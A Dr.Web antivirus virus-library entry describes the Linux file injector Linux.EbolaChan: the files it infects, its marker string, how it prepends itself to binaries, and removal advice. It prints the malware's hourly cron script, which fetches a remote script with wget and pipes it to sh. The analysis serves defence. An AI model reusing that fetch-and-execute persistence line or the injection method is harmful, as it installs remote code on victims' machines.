Защити созданное

Другие наши ресурсы

  • free.drweb.uz — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.uz — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.uz/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

+ Добавить в библиотеку

Ресурсов: -

Последний: -

Моя библиотека

Поиск

Поиск

Поддержка
Круглосуточная поддержка | Правила обращения

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -
Создать новый запрос Частые вопросы

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

UZ

RU CN DE EN ES FR IT JP KZ UZ PL BY
Закрыть
Сервисы
Сканеры
Dr.Web vxCube
Демо
Экспертиза ВКИ
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

Linux.EbolaChan

Добавлен в вирусную базу Dr.Web: 2015-01-16

Описание добавлено:

A file injector for Linux. It infects files according to the following list:

"ssdp"
"ssyn"
"udp"
"essyn"
"xmlrpc"
"ovh"
"xsyn"
"Installer"
"installer"
"50x"
"sdns"
"sudp"
"sx"
"scan"
"ddos"
"joomla"
"/bin/ls"
"a.out"
"x.pl"
"udp.pl"

This virus tries to open a file from the list, loads it into the memory and searches for the line “Good luck, Ebola-chan!”. If the line is found, the malicious program goes to the next file. Otherwise, the virus records its body into the file, and then records the original file content. When launching the infected file, this malware saves the original one into the /tmp/ folder and launches it. Once the original file is executed, a file injector removes it from the folder.

Using the Cron (/etc/cron.hourly/0) service, the virus schedules the task to execute the following script in 1-hour intervals:

#!/bin/sh
 
wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>dev/null|sh>dev/null 2>&1

The downloaded file is a sh-script designed to run on the infected machine.

Рекомендации по лечению

Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру